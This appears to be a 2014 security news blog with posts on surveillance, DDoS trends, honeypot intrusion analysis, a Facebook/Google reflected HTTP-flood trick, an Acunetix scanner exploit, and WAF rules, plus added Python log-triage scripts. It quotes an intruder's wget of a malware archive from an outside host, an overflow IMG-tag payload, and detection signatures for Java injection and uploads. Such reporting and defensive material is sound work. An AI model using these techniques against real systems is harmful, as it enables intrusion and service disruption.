In an official document, the Internet Engineering Task Force (IETF) has determined that pervasive, indiscriminate surveillance is to be regarded as an attack on privacy, which the IETF must counter through the design and definition of its protocols.

From the RFC:

   Pervasive Monitoring (PM) is widespread (and often covert)
   surveillance through intrusive gathering of protocol artefacts,
   including application content, or protocol metadata such as headers.
   Active or passive wiretaps and traffic analysis, (e.g., correlation,
   timing or measuring packet sizes), or subverting the cryptographic
   keys used to secure protocols can also be used as part of pervasive
   monitoring.  PM is distinguished by being indiscriminate and very
   large scale, rather than by introducing new types of technical
   compromise.

   The IETF community's technical assessment is that PM is an attack on
   the privacy of Internet users and organisations.  The IETF community
   has expressed strong agreement that PM is an attack that needs to be
   mitigated where possible, via the design of protocols that make PM
   significantly more expensive or infeasible.  Pervasive monitoring was
   discussed at the technical plenary of the November 2013 IETF meeting
   [IETF88Plenary] and then through extensive exchanges on IETF mailing
   lists.  This document records the IETF community's consensus and
   establishes the technical nature of PM.

References




DNS Flood of 1.5 Billion Requests a Minute: When Anti-DDoS Services Attack

2014.05.18

Interesting article by Incapsula on a new kind of attack originating from the networks of anti-DDoS service providers:

"The attack fit the description of other recently reported DNS floods, like the one that brought down UltraDNS earlier this month. With multiple reports coming from different directions, and with several large scale attacks on our own infrastructure, we are now convinced that what we are seeing here is an evolving new trend - one that can endanger even the most hardened network infrastructures.

Interestingly enough, in this case, the DNS queries contained non-spoofed IP data that allowed us to uncover the attacker’s true points of origin.

When we did, we were surprised to learn that the malicious requests were originating from servers of two other anti-DDoS service providers – one based in Canada, the other in China. All told, these were hitting our network at a rate of 1.5 Billion DNS queries a minute, amounting to over 630 Billion requests during the course of the 7 hour-long DDoS attack."

imperva-dns-ddos

Link:




Fun with the machine: 25-year-old DOS virus signature inserted into the Bitcoin blockchain

2014.05.18

Fefe, verbatim:

"A joker has inserted a 25-year-old DOS virus into the Bitcoin blockchain and now all the "antivirus" products are raising alarms :-)"

From the discussion at Microsoft:

"Earlier today, a virus signature from the virus "DOS/STONED" was uploaded into the Bitcoin blockchain, which allows small snippets of text to accompany user transactions with bitcoin. Since this is only the virus signature and not the virus itself, there apparently is no danger to users in any way. However, MSE recognizes the signature for the virus and continuously reports it as a threat, and every time it deletes the file, the bitcoin client will simply re-download the missing blockchain.

It appears to be a joke or prank, simply because this particular virus does nothing more than periodically show "YOUR COMPUTER HAS BEEN STONED" on one out of every eight computer boot-ups, and is over 25 years old."

Links:




How to Catch a Hacker in the Act

2014.05.17

Detailed article about a worldwide honeypot project by Hut3; besides statistics and analyses, videos of live break-ins are shown.

"Within seconds of the honeypots being live, attackers flocked to our dummy servers, their scanning tools quickly able to identify the vulnerable machines. Most attackers will not peruse the internet trying to identify a multitude of vulnerabilities. Instead, they will repeatedly probe with tools like Masscan for weak machines on which their devised exploits will work. This is much quicker and much more effective for launching a specific attack"

honeypot-analyse





How I bypassed 2-Factor-Authentication on Google, Facebook, Yahoo, LinkedIn, and many others.

2014.05.17

Article by Shubham Shah about a very ingenious method of bypassing 2-factor authentication:

"I remember fondly two years ago, when 2-Factor-Authentication (2FA) became popular and well used across major web applications (Google, Facebook, Yahoo and others). I found, my naive sixteen year old self unable to come to terms for why the genius idea had not been thought of before. At the time, I felt that 2FA was that golden shield you could cover yourself with and defend against some of the most sophisticated phishing attacks calmly.

Whilst 2FA can still be that golden shield to the critical applications you use in your life, I shall be documenting below - using an array of exploitation methods, how I was able to bypass 2FA for Google, Facebook, Yahoo, LinkedIn and basically any service which sends 2FA tokens to voicemail."

more info




HTTP Security Headers on Top 10k Alexa Websites

2014.05.16

Security header evaluation of the Alexa Top 10,000 websites

top-10k-headers

More info @ paulsec.github.io

Additional info: Hackertarget.com makes the headers of the top 500,000 websites available for download.




Hacking the Java Debug Wire Protocol - or - "How I met your Java debugger"

2014.05.09

TL;DR: turn any open JDWP service into reliable remote code execution (exploit inside)

More info: Hacking the Java Debug Wire Protocol - or - "How I met your Java debugger" by ioactive




Fishing for Hackers: Analysis of a Linux Server Attack

2014.05.09

In a detailed article, Gianluca Borello describes how live break-ins can be analysed with the help of an SSH honeypot and the sysdig tool.

"A few days ago I stumbled upon a classic blog post covering common recommendations for hardening a fresh new Linux server: install fail2ban, disable SSH password authentication, randomize SSH port, configure iptables, etc. That got me thinking: what would happen if I did exactly the opposite? Of course the most common result is to fall victim to a botnet that is scanning a wide range of public IP addresses, hoping to find some poorly configured service to attack with brute force (SSH or Wordpress to name a few). But what actually happens when you are the victim of one of these simple attacks? What does an attacker do? This post tries to answer these questions by analyzing an actual attack on our servers, captured entirely with sysdig. So let's go fishing!"

A few outputs from the system trace:

$ sysdig -r trace.scap.gz -c topprocs_net
Bytes     Process
------------------------------
439.63M   /usr/sbin/httpd
422.29M   /usr/local/apac
5.27M     sshd
2.38M     wget
20.81KB   httpd
9.94KB    httpd
6.40KB    perl

$ sysdig -r trace.scap.gz -c topconns
Bytes     Proto     Connection
------------------------------
439.58M   udp       170.170.35.93:50978->39.115.244.150:800
422.24M   udp       170.170.35.93:55169->39.115.244.150:800
4.91M     tcp       85.60.66.5:59893->170.170.35.93:22
46.72KB   tcp       170.170.35.93:39193->162.243.147.173:3132
43.62KB   tcp       170.170.35.93:39194->162.243.147.173:3132
20.81KB   tcp       170.170.35.93:53136->198.148.91.146:6667
1000B     udp       170.170.35.93:0->39.115.244.150:800

$ sysdig -r trace.scap.gz -c spy_users
06:11:28 root) cd /usr/sbin
06:11:30 root) mkdir .shm
06:11:32 root) cd /usr/sbin/.shm
06:11:39 root) wget xxxxxxxxx.altervista.org/l.tgz
06:11:40 root) tar zxvf l.tgz
06:11:42 root) cd /usr/sbin/.shm/lib/.muh/src
06:11:43 root) /bin/bash ./configure --enable-local
06:11:56 root) make all
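As an added example (not from the article and not part of sysdig), the following Python triage reads the two chisel outputs quoted above: it flags, from the victim's point of view, the three patterns the trace shows (large outbound UDP towards one peer, an outbound IRC connection, a heavy inbound SSH session) and maps the spy_users command lines to intrusion stages. The sample output is constructed in the same column layout with IPs from documentation ranges; the byte thresholds and IRC ports are assumptions.

```python
"""Triage helpers for `sysdig -c topconns` and `sysdig -c spy_users` output.
Added example; sample data is constructed, thresholds are assumptions."""
import re

SIZE_RE = re.compile(r'^([\d.]+)(KB|MB|GB|M|G|B)?$')
UNITS = {None: 1, 'B': 1, 'KB': 1024, 'M': 1024 ** 2, 'MB': 1024 ** 2,
         'G': 1024 ** 3, 'GB': 1024 ** 3}
CONN_RE = re.compile(r'^(\S+)\s+(tcp|udp)\s+([\d.]+):(\d+)->([\d.]+):(\d+)$')
CMD_RE = re.compile(r'^(\d\d:\d\d:\d\d) (\S+)\) (.*)$')

FLOOD_BYTES = 100 * 1024 ** 2   # assumed: outbound UDP above this looks like a flood
IRC_PORTS = {6667, 6697}        # assumed: classic IRC C2 ports


def parse_size(s):
    """'439.58M' -> bytes, as printed by the topconns chisel."""
    m = SIZE_RE.match(s)
    return int(float(m.group(1)) * UNITS[m.group(2)])


def triage_topconns(text, local_ip):
    """Return (kind, peer, port, bytes) findings for one host's topconns output."""
    findings = []
    for line in text.splitlines():
        m = CONN_RE.match(line.strip())
        if not m:                      # header and separator lines
            continue
        size, proto, sip, sport, dip, dport = m.groups()
        nbytes, outbound, dport = parse_size(size), sip == local_ip, int(dport)
        if outbound and proto == 'udp' and nbytes >= FLOOD_BYTES:
            findings.append(('udp_flood_source', dip, dport, nbytes))   # we are the DDoS source
        elif outbound and proto == 'tcp' and dport in IRC_PORTS:
            findings.append(('irc_c2', dip, dport, nbytes))             # bot talking to IRC
        elif not outbound and dport == 22 and nbytes >= 1024 ** 2:
            findings.append(('ssh_bruteforce', sip, dport, nbytes))     # heavy inbound SSH
    return findings


# Intrusion stages recognisable in the shell commands the attacker typed.
STAGES = [('hidden_dir', re.compile(r'\bmkdir\s+\.\S+|\bcd\s+\S*/\.\S+')),
          ('download', re.compile(r'\b(wget|curl)\s+')),
          ('unpack', re.compile(r'\btar\s+\S*x')),
          ('build', re.compile(r'\./configure|\bmake\b'))]


def triage_spy_users(text):
    """Return (timestamp, user, stage, command) for every recognised command."""
    stages = []
    for line in text.splitlines():
        m = CMD_RE.match(line.strip())
        if not m:
            continue
        ts, user, cmd = m.groups()
        for name, rx in STAGES:
            if rx.search(cmd):
                stages.append((ts, user, name, cmd))
                break
    return stages


# Constructed sample output (same layout as the chisels print it).
TOPCONNS = """\
Bytes     Proto     Connection
------------------------------
439.58M   udp       192.0.2.10:50978->198.51.100.5:800
4.91M     tcp       203.0.113.9:59893->192.0.2.10:22
46.72KB   tcp       192.0.2.10:39193->203.0.113.20:3132
20.81KB   tcp       192.0.2.10:53136->203.0.113.30:6667
1000B     udp       192.0.2.10:0->198.51.100.5:800
"""
SPY_USERS = """\
06:11:28 root) cd /usr/sbin
06:11:30 root) mkdir .shm
06:11:32 root) cd /usr/sbin/.shm
06:11:39 root) wget example.invalid/l.tgz
06:11:40 root) tar zxvf l.tgz
06:11:43 root) /bin/bash ./configure --enable-local
06:11:56 root) make all
"""

if __name__ == '__main__':
    for f in triage_topconns(TOPCONNS, '192.0.2.10'):
        print('conn  :', f)
    for s in triage_spy_users(SPY_USERS):
        print('stage :', s)
```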

More info:




OAuth/OpenID Covert Redirect: Old Bug + New FAQ

2014.05.03

An Old Bug gets some New Attention: OpenID Covert Redirect.

tl;dr:

Fortunately, Covert Redirect is not the next Heartbleed. In fact, from what we can ascertain, the Covert Redirect "flaw" isn't even new. Moreover, classifying Covert Redirect as a vulnerability with OAuth 2.0 and OpenID is incorrect. -- mashable.com

First of all it is a known Facebook Connect bug, other providers are not vulnerable (author claims they are?), because Connect allows you to replace response_type and redirect_uri with new values. -- egor homakov

some smart explanations from smart people:




Script fools n00b hackers into hacking themselves

2014.05.02

by The Register:

"Indian Facebook users targeting their mates shoot selves in foot.

noob father

Security experts have warned Facebook users in India not to fall for a new scam which tricks victims into “self cross-site scripting” by promising access to a tool which will let them hack their friends’ accounts.

Symantec security response manager Satnam Narang revealed in a blog entry that a post began circulating last week on Facebook featuring a video with tips on how to hack accounts.

That post apparently linked to a Google Drive document containing code that the scammers claimed will allow users to see their friends’ passwords, if they cut and paste it into their browser window.

He continued:

What really happens when you paste this code into your browser console window is that a series of actions are performed using your Facebook account without your knowledge. Behind the scenes, your account is used to follow lists and users, and give likes to pages in order to inflate the follower and like counts defined by the scammers.

Your account is also used to tag the names of all your friends in the comment section of the original post. This is done to help the scam spread further, playing off the curiosity of your friends, who may visit the post to find out more and hopefully follow the instructions as well.

Pics somewhat related

noobs

gangsta idiots




Nginx overtakes Apache among the top 1000 websites

2014.04.29

In April 2014 Nginx overtook the Apache web server for the first time in the ranking of the top 1000 websites, with 38.2% just ahead of Apache at 34.2% [1].

Overall, Nginx usage has doubled in the last 2 years; since 2010 the growth is more than fivefold.

Web server ranking 2014
nginx-usage 2014

Web server ranking 2013
nginx-usage 2013

historical data, all sites
webserver-usage

all data/graphics by kind permission of & (c) Copyright 2013, 2014 W3Techs

omg!

References

  1. Usage of web servers broken down by ranking / w3techs



Nginx 1.6.0 and 1.7.0 released

2014.04.28

On 24.04. Nginx 1.6.0 stable was released; this branch now contains the changes from the 1.5.x branch, among others (the complete list of new features is further below) [2,3,4]

  • some new SSL features
  • SPDY 3.1 support
  • cache revalidation
  • auth request module

Furthermore, the mainline 1.5 branch has been renamed to the 1.7 branch, in which the development of new modules and features will continue; a blog post on nginx.com explains the differences between the two branches [1]

nginx-branches

(image with permission from nginx.com)

Complete list of new features from the changelog [4]

  • Feature: the ngx_http_mp4_module now supports the "end" argument.
  • Feature: byte ranges support in the ngx_http_mp4_module and while saving responses to cache.
  • Feature: the "proxy_protocol" parameters of the "listen" and "real_ip_header" directives, the $proxy_protocol_addr variable.
  • Feature: the $ssl_session_reused variable.
  • Feature: the ngx_http_spdy_module now uses SPDY 3.1 protocol. Thanks to Automattic and MaxCDN for sponsoring this work.
  • Feature: the ngx_http_mp4_module now skips tracks too short for a seek requested.
  • Feature: the "ssl_buffer_size" directive.
  • Feature: the "limit_rate" directive can now be used to rate limit responses sent in SPDY connections.
  • Feature: the "spdy_chunk_size" directive.
  • Feature: the "ssl_session_tickets" directive. Thanks to Dirkjan Bussink.
  • Feature: IPv6 support in resolver.
  • Feature: the "listen" directive supports the "fastopen" parameter. Thanks to Mathew Rodley.
  • Feature: SSL support in the ngx_http_uwsgi_module. Thanks to Roberto De Ioris.
  • Feature: vim syntax highlighting scripts were added to contrib. Thanks to Evan Miller.
  • Feature: the "proxy_cache_revalidate", "fastcgi_cache_revalidate", "scgi_cache_revalidate", and "uwsgi_cache_revalidate" directives.
  • Feature: the "ssl_session_ticket_key" directive. Thanks to Piotr Sikora.
  • Feature: the "fastcgi_buffering" directive.
  • Feature: the "proxy_ssl_protocols" and "proxy_ssl_ciphers" directives. Thanks to Piotr Sikora.
  • Feature: optimization of SSL handshakes when using long certificate chains.
  • Feature: the mail proxy supports SMTP pipelining.
  • Feature: the "disable_symlinks" directive now uses O_PATH on Linux.
  • Feature: now nginx uses EPOLLRDHUP events to detect premature connection close by clients if the "epoll" method is used.
  • Feature: the ngx_http_auth_request_module.
  • Feature: now several "error_log" directives can be used.
  • Feature: the "ssi_last_modified", "sub_filter_last_modified", and "xslt_last_modified" directives. Thanks to Alexey Kolpakov.
  • Feature: the "http_403" parameter of the "proxy_next_upstream", "fastcgi_next_upstream", "scgi_next_upstream", and "uwsgi_next_upstream" directives.
  • Feature: the "allow" and "deny" directives now support unix domain sockets.

References

  1. NGINX 1.6 and 1.7 released / nginx.com
  2. [nginx-announce] nginx-1.6.0
  3. [nginx-announce] nginx-1.7.0
  4. Changelog 1.6



Using Facebook Notes + Google to DDoS any website / Reflected HTTP-DDOS

2014.04.25

Facebook Notes allows users to include <img> tags. Whenever an <img> tag is used, Facebook crawls the image from the external server and caches it. Facebook will only cache the image once; however, using random GET parameters the cache can be bypassed and the feature abused to cause a huge HTTP GET flood.

reflected http ddos - facebook

Google uses its FeedFetcher crawler to cache anything that is put inside =image("link") in a spreadsheet. For instance: if we put =image("http://example.com/image.jpg") in one of the cells of a Google spreadsheet, Google will send the FeedFetcher crawler to grab the image and cache it for display.

However, one can append a random request parameter to the filename and tell FeedFetcher to crawl the same file multiple times. Say, for instance, a website hosts a 10 MB file.pdf; pasting a list of such =image() calls, each with a different parameter, into the spreadsheet will cause Google's crawler to fetch the same file 1000 times.

reflected http ddos - google

Workarounds

nginx

http {

   # Map crawler user agents to the client address; everything else maps to ''
   # (an empty key is never rate limited, so normal visitors are unaffected).
   map $http_user_agent $limit_bots {
       default '';
       ~*(google|bing|yandex|msnbot|facebookexternalhit) $binary_remote_addr;
   }

   # One request per second per crawler address.
   limit_req_zone $limit_bots zone=bots:10m rate=1r/s;

   server {

     location / {
       limit_req zone=bots burst=5 nodelay;
     }

   }

}

Apache

# Thors-Hammer-Solution: answer Facebook's crawler with a tiny stop image
# instead of the requested media file. Both conditions must hold (crawler UA
# AND not already stop.jpg), the second one prevents a redirect loop.
RewriteEngine on
RewriteCond %{HTTP_USER_AGENT} ^facebookexternalhit.*$ [NC]
RewriteCond %{REQUEST_URI} !/images/stop.jpg
RewriteRule .*\.(mpg|png|mp3|gif|GIF|jpg|JPG)$ /images/stop.jpg [R,L]
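As an added example (not from the original post or the linked article), the following Python script looks for the footprint such a reflected flood leaves in an access log: one crawler user agent fetching the same path many times with a different query string each time, which is exactly what the nginx map above rate-limits. The log lines are constructed, with IPs from documentation ranges; the crawler list mirrors the nginx map.

```python
"""Detect cache-busting crawler floods (reflected HTTP DDoS via Facebook Notes
or Google FeedFetcher) in combined-format access logs. Added example; the
sample log lines are constructed."""
import re
from collections import defaultdict
from urllib.parse import urlsplit

# Combined log format as written by nginx/apache by default.
LOG_RE = re.compile(
    r'(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) \S+" '
    r'(?P<status>\d{3}) (?P<bytes>\d+|-) "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"')

# Same crawler families as the nginx map in the workaround.
CRAWLER_RE = re.compile(r'(google|bing|yandex|msnbot|facebookexternalhit)', re.I)


def parse_line(line):
    """Return a dict for one log line (None if it does not parse)."""
    m = LOG_RE.match(line)
    if not m:
        return None
    d = m.groupdict()
    d['bytes'] = 0 if d['bytes'] == '-' else int(d['bytes'])
    crawler = CRAWLER_RE.search(d['ua'])
    d['crawler'] = crawler.group(1).lower() if crawler else None
    parts = urlsplit(d['target'])
    d['path'], d['query'] = parts.path, parts.query
    return d


def find_cache_busting(lines, min_hits=10, min_distinct_ratio=0.9):
    """Return {(crawler, path): stats} for resources one crawler fetched at
    least `min_hits` times with (almost) always different query strings.
    A real crawler refetches a URL rarely; a reflected flood shows one path,
    many unique query strings and a lot of bytes."""
    buckets = defaultdict(lambda: {'hits': 0, 'queries': set(), 'bytes': 0})
    for line in lines:
        rec = parse_line(line)
        if not rec or not rec['crawler']:
            continue
        b = buckets[(rec['crawler'], rec['path'])]
        b['hits'] += 1
        b['queries'].add(rec['query'])
        b['bytes'] += rec['bytes']
    suspicious = {}
    for key, b in buckets.items():
        distinct = len(b['queries'])
        if b['hits'] >= min_hits and distinct / b['hits'] >= min_distinct_ratio:
            suspicious[key] = {'hits': b['hits'], 'distinct_queries': distinct,
                               'bytes': b['bytes']}
    return suspicious


def constructed_sample():
    """Constructed log: 12 crawler hits on one PDF with a fresh ?r= each time,
    3 ordinary Googlebot fetches of the front page and 1 human download."""
    fb = ('203.0.113.{n} - - [25/Apr/2014:10:00:{s:02d} +0200] '
          '"GET /big/file.pdf?r={n} HTTP/1.1" 200 10485760 "-" '
          '"facebookexternalhit/1.1 (+http://www.facebook.com/externalhit_uatext.php)"')
    lines = [fb.format(n=i, s=i) for i in range(1, 13)]
    lines += ['192.0.2.1 - - [25/Apr/2014:10:01:00 +0200] "GET /index.html HTTP/1.1" '
              '200 5120 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"'] * 3
    lines.append('198.51.100.7 - - [25/Apr/2014:10:02:00 +0200] "GET /big/file.pdf?r=1 HTTP/1.1" '
                 '200 10485760 "http://example.com/" "Mozilla/5.0 (X11; Linux x86_64) Firefox/28.0"')
    return lines


if __name__ == '__main__':
    for (crawler, path), stats in find_cache_busting(constructed_sample()).items():
        print(f'{crawler} -> {path}: {stats}')
```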



Pwn the n00bs - Acunetix 0day

2014.04.24

Link to the original article by Danor Cohen (An7i): Pwn the n00bs - Acunetix 0day

tl;dr:

  1. create a hidden IMG tag with more than 256 characters and some shellcode, à la
    <img src="http://AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAA500fBBBB]Qy~”>
  2. wait for someone to visit the prepared page with the Acunetix scanner
  3. ???
  4. PROFIT!

From the article:

"Following all the above, we created a powerful exploit that Newbie hackers will definitely fall for. This exploit will give us the ability to do everything with all that nasty Newbie hackers that scan our sites day and night, killing our traffic, filling all the web site forms with junk and so on… Furthermore it can be used in order to collect smart intelligence about hostile forces who want to attack our web application."

acunetix-0day




The rise of DDoS Botnets by Imperva

2014.04.04

The following charts show the development of botnets and botnet-capabilities in 2013/2014.

Source: The rise of DDoS Botnets by Imperva

ddos-attacks




30 critical Java / Oracle Cloud vulns published by Adam Gowdiak (Naxsi ruleset update)

2014.04.03

Adam Gowdiak has published 30+ critical vulnerabilities and PoCs against Oracle's Java Cloud and WebLogic Server; see SE-2013-01 Press Info (2) @ security-explorations.com

CAUTION: these rules are untested, since we don't run any WebLogic server or Oracle cloud services, and they might break things. Please test carefully before deploying.

After briefly skimming through the exploit code, I came up with some Naxsi rules to possibly detect malicious access attempts (updates have already been pushed to the doxi rulesets).

[+] new sigs:
  42000346 :: app_server.rules     :: Possible Java-Beans-Injection
  42000347 :: web_apps.rules       :: Possible Wordpress-Plugin-Backdoor detected
  42000348 :: app_server.rules     :: Possible Java.Lang - Injection (URL-Args & POST-Body)
  42000349 :: app_server.rules     :: Possible JAR-File Upload
  42000350 :: app_server.rules     :: Possible WAR - File Upload
  42000351 :: app_server.rules     :: Possible JSP - File Upload
  42000352 :: app_server.rules     :: Properties-File Access / Upload
  42000353 :: app_server.rules     :: Content-Type x-java-serialized-object
  42000354 :: app_server.rules     :: WebLogicServer wls_deployment_internal - Access
  42000355 :: app_server.rules     :: WebLogicServer wls_internal - Access



#
# sid: 42000355 | date: 2014-04-03 - 23:00 
#
# http://www.security-explorations.com/en/SE-2013-01-press2.html
#
MainRule "str:wls_internal/" "msg:WebLogicServer wls_internal - Access" "mz:URL" "s:$UWA:8" id:42000355  ;


#
# sid: 42000354 | date: 2014-04-03 - 22:59 
#
# http://www.security-explorations.com/en/SE-2013-01-press2.html
#
MainRule "str:wls_deployment_internal/" "msg:WebLogicServer wls_deployment_internal - Access" "mz:URL" "s:$UWA:8" id:42000354  ;


#
# sid: 42000353 | date: 2014-04-03 - 22:58 
#
# http://www.security-explorations.com/en/SE-2013-01-press2.html
#
MainRule "str:x-java-serialized-object" "msg:Content-Type x-java-serialized-object" "mz:$HEADERS_VAR:Content-Type" "s:$UWA:8" id:42000353  ;


#
# sid: 42000352 | date: 2014-04-03 - 22:54 
#
# http://www.security-explorations.com/en/SE-2013-01-press2.html
#
MainRule "str:.properties" "msg:Properties-File Access / Upload" "mz:URL|FILE_EXT" "s:$UWA:8" id:42000352  ;


#
# sid: 42000351 | date: 2014-04-03 - 22:51 
#
# http://www.security-explorations.com/en/SE-2013-01-press2.html
#
MainRule "str:.jsp" "msg:Possible JSP - File Upload" "mz:FILE_EXT" "s:$UWA:8" id:42000351  ;


#
# sid: 42000350 | date: 2014-04-03 - 22:41 
#
# 
#
MainRule "str:.war" "msg:Possible WAR - File Upload" "mz:FILE_EXT" "s:$UWA:8" id:42000350  ;


#
# sid: 42000349 | date: 2014-04-03 - 22:42 
#
# 
#
MainRule "str:.jar" "msg:Possible JAR-File Upload" "mz:FILE_EXT" "s:$UWA:8" id:42000349  ;


#
# sid: 42000348 | date: 2014-04-03 - 21:57 
#
# phew! http://www.security-explorations.com/en/SE-2013-01-press2.html
#
MainRule "str:java.lang." "msg:Possible Java.Lang - Injection (URL-Args & POST-Body)" "mz:BODY|ARGS" "s:$UWA:8" id:42000348  ;


#
# sid: 42000346 | date: 2014-03-20 - 19:44 
#
# http://blog.diniscruz.com/2013/12/xstream-remote-code-execution-exploit.html
# ref - sid: 42000286
#
MainRule "str:java.beans.eventhandler" "msg:Possible Java-Beans-Injection" "mz:BODY|ARGS" "s:$UWA:8" id:42000346  ;

References




Cryptolocker … you little shit

2014.04.01

Interesting article by a whitehat who gained access to the Cryptolocker backend database through a small hack; the DB access has apparently been closed in the meantime, but the site reachable via TOR is still online.

cryptolocker

Source: Cryptolocker … you little shit.




How a Hacker Intercepted FBI and Secret Service Calls With Google Maps

2014.03.04

from Gawker.com:

"Earlier this week, Bryan Seely, a network engineer and one-time Marine, played me recordings of two phone calls (embedded below.) The calls were placed by unwitting citizens to the FBI office in San Francisco and to the Secret Service in Washington, D.C. Neither the callers nor the FBI or Secret Service personnel who answered the phone realized that Seely was secretly recording them. He used Google Maps to do it."

Read more @ gawker.com




testssl.sh: Testing TLS/SSL encryption

2014.02.28

testssl

testssl.sh is a free Unix command line tool which checks a server's service on any port for the support of TLS/SSL ciphers and protocols as well as some cryptographic flaws.

It is designed to provide clear output for a "is this good or bad" decision.

GOTO: testssl.sh




GitHub RCE by Environment variable injection Bug Bounty writeup by Joernchen

2014.02.27

GitHub blogged a while ago about some internal tool called gerve: https://github.com/blog/530-how-we-made-github-fast

Upon git+sshing to github.com gerve basically looks up your permission on the repo you want to interact with. Then it bounces you further in another forced SSH session to the back end where the repo actually is.

At some point I figured that it is possible to inject some environment variables into gerve/the forked SSH process by setting my username to something like "joerchen\n\nLD_ASSUME_KERNEL=1\n\n".

Read more




PostgreSQL packages for Debian and Ubuntu updated

2014.02.26

postgresql-logo

From the PostgreSQL wiki:

"The PostgreSQL Global Development Group (PGDG) maintains an APT repository of PostgreSQL packages for Debian and Ubuntu located at http://apt.postgresql.org/pub/repos/apt/. We aim at building PostgreSQL server packages as well as extensions and modules packages on several Debian/Ubuntu releases for all PostgreSQL versions supported.

Currently, we support

  • Debian 6.0 (squeeze), 7.0 (wheezy), and unstable (sid) 64/32 bit (amd64/i386)
  • Ubuntu 10.04 (lucid), 12.04 (precise), 13.10 (saucy), 14.04 (trusty) 64/32 bit (amd64/i386)
  • PostgreSQL 8.4, 9.0, 9.1, 9.2, 9.3
  • Server extensions such as Slony-I, various PL languages, and datatypes
  • Applications like pgadmin3, pgbouncer, and pgpool-II

Packages for older PostgreSQL versions and older Debian/Ubuntu distributions will continue to stay in the repository; updates for those will be provided on an ad-hoc basis."

GOTO: wiki.postgresql.org

References:




SSL Labs: Testing for Apple's TLS authentication bug

2014.02.26

apple-ssl-tls-bug

The SSL Labs Client Test from ssllabs.com has been extended and can now check browsers and clients for the Apple SSL/TLS authentication bug.

In a blog post, Ivan Ristić explains further details of the test.




Rock, Paper, Scissors for SecOps

2014.02.24

schere stein papier

courtesy of and copyright by Lenny Zeltser




An In-depth Analysis of Linux/Ebury-Rootkit (ESET-Blog)

2014.02.24

linux backdoored

From the article:

"ESET has been analyzing and tracking an OpenSSH backdoor and credential stealer named Linux/Ebury. The result of this work on the Linux/Ebury malware family is part of a joint research effort with CERT‑Bund, the Swedish National Infrastructure for Computing, the European Organization for Nuclear Research (CERN) and other organizations forming an international Working Group.

In this blog post, we provide an in-depth analysis of Linux/Ebury. It is a sophisticated backdoor used to steal OpenSSH credentials and maintain access to a compromised server. According to previous reports, this backdoor has been in the wild for at least two years."

To the article: An In-depth Analysis of Linux/Ebury




WAF rules for Tomcat/Apache Commons FileUpload DoS CVE-2014-0050

2014.02.17

Explanation of the vulnerability and further workarounds (Apache/Nginx):

Sleep, Tomcat, Sleep - Tomcat/Apache Commons FileUpload DoS and Workarounds CVE-2014-0050

Naxsi

#
# sid: 42000342 |  date: 2014-02-16 - 00:54:09 | maker: lazydog
# 
# http://mail-archives.apache.org/mod_mbox/www-announce/201402.mbox/%3C52F373FC.9030907@apache.org%3E
# http://blog.spiderlabs.com/2014/02/cve-2014-0050-exploit-with-boundaries-loops-without-boundaries.html


MainRule "rx:multipart\/form-data;(\s*)boundary=[a-zA-Z0-9_-]{4000}" "msg:DN APP_SERVER Tomcat/Apache-Commons File Upload DOS Attempt" "mz:$HEADERS_VAR:Content-Type" "s:$ATTACK:8" id:42000342 ; 

ModSecurity

# Block a Content-Type header of 4000+ characters (the overlong multipart boundary);
# ModSecurity 2.7+ requires an id and an action on every rule
SecRule REQUEST_HEADERS:Content-Type "@rx .{4000}" "id:42000342,phase:1,deny,status:403,msg:'Tomcat/Apache-Commons FileUpload DoS attempt (CVE-2014-0050)'"
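To show what the Naxsi rules quoted above actually match (the SE-2013-01 Java/WebLogic rules from the ruleset update and the CVE-2014-0050 boundary-length rule here), the following is an added example, not Naxsi's own code: a simplified re-implementation of how MainRule signatures are applied to a request, restricted to the match zones those rules use (URL, ARGS, BODY, FILE_EXT, $HEADERS_VAR:<name>). The sample requests are constructed; treating str: and rx: as case-insensitive and the CheckRule thresholds of 8 are assumptions.

```python
"""Simplified Naxsi-style matcher for the MainRule signatures quoted on this
page. Added example, not Naxsi itself: only the match zones used by these
rules are modelled, and case-insensitive matching plus the block thresholds
are assumptions."""
import re

# Rules copied from the two posts (rx: for CVE-2014-0050, str: for the rest).
RULES_TEXT = r'''
MainRule "str:wls_internal/" "msg:WebLogicServer wls_internal - Access" "mz:URL" "s:$UWA:8" id:42000355 ;
MainRule "str:x-java-serialized-object" "msg:Content-Type x-java-serialized-object" "mz:$HEADERS_VAR:Content-Type" "s:$UWA:8" id:42000353 ;
MainRule "str:.properties" "msg:Properties-File Access / Upload" "mz:URL|FILE_EXT" "s:$UWA:8" id:42000352 ;
MainRule "str:.jsp" "msg:Possible JSP - File Upload" "mz:FILE_EXT" "s:$UWA:8" id:42000351 ;
MainRule "str:java.lang." "msg:Possible Java.Lang - Injection (URL-Args & POST-Body)" "mz:BODY|ARGS" "s:$UWA:8" id:42000348 ;
MainRule "rx:multipart\/form-data;(\s*)boundary=[a-zA-Z0-9_-]{4000}" "msg:DN APP_SERVER Tomcat/Apache-Commons File Upload DOS Attempt" "mz:$HEADERS_VAR:Content-Type" "s:$ATTACK:8" id:42000342 ;
'''
# Assumed CheckRule thresholds, in the style of: CheckRule "$UWA >= 8" BLOCK;
BLOCK_THRESHOLDS = {'$UWA': 8, '$ATTACK': 8}

QUOTED_RE = re.compile(r'"([^"]*)"')
ID_RE = re.compile(r'\bid:(\d+)')


def parse_rules(text=RULES_TEXT):
    """Turn MainRule lines into dicts with a test callable, zones and score."""
    rules = []
    for line in text.splitlines():
        if not line.lstrip().startswith('MainRule'):
            continue
        rule = {'id': int(ID_RE.search(line).group(1))}
        for field in QUOTED_RE.findall(line):
            key, _, val = field.partition(':')
            if key == 'str':                       # substring, case-insensitive
                rule['test'] = lambda s, v=val.lower(): v in s.lower()
            elif key == 'rx':                      # PCRE-style regex
                rule['test'] = re.compile(val, re.I).search
            elif key == 'msg':
                rule['msg'] = val
            elif key == 'mz':                      # match zones, '|'-separated
                rule['zones'] = val.split('|')
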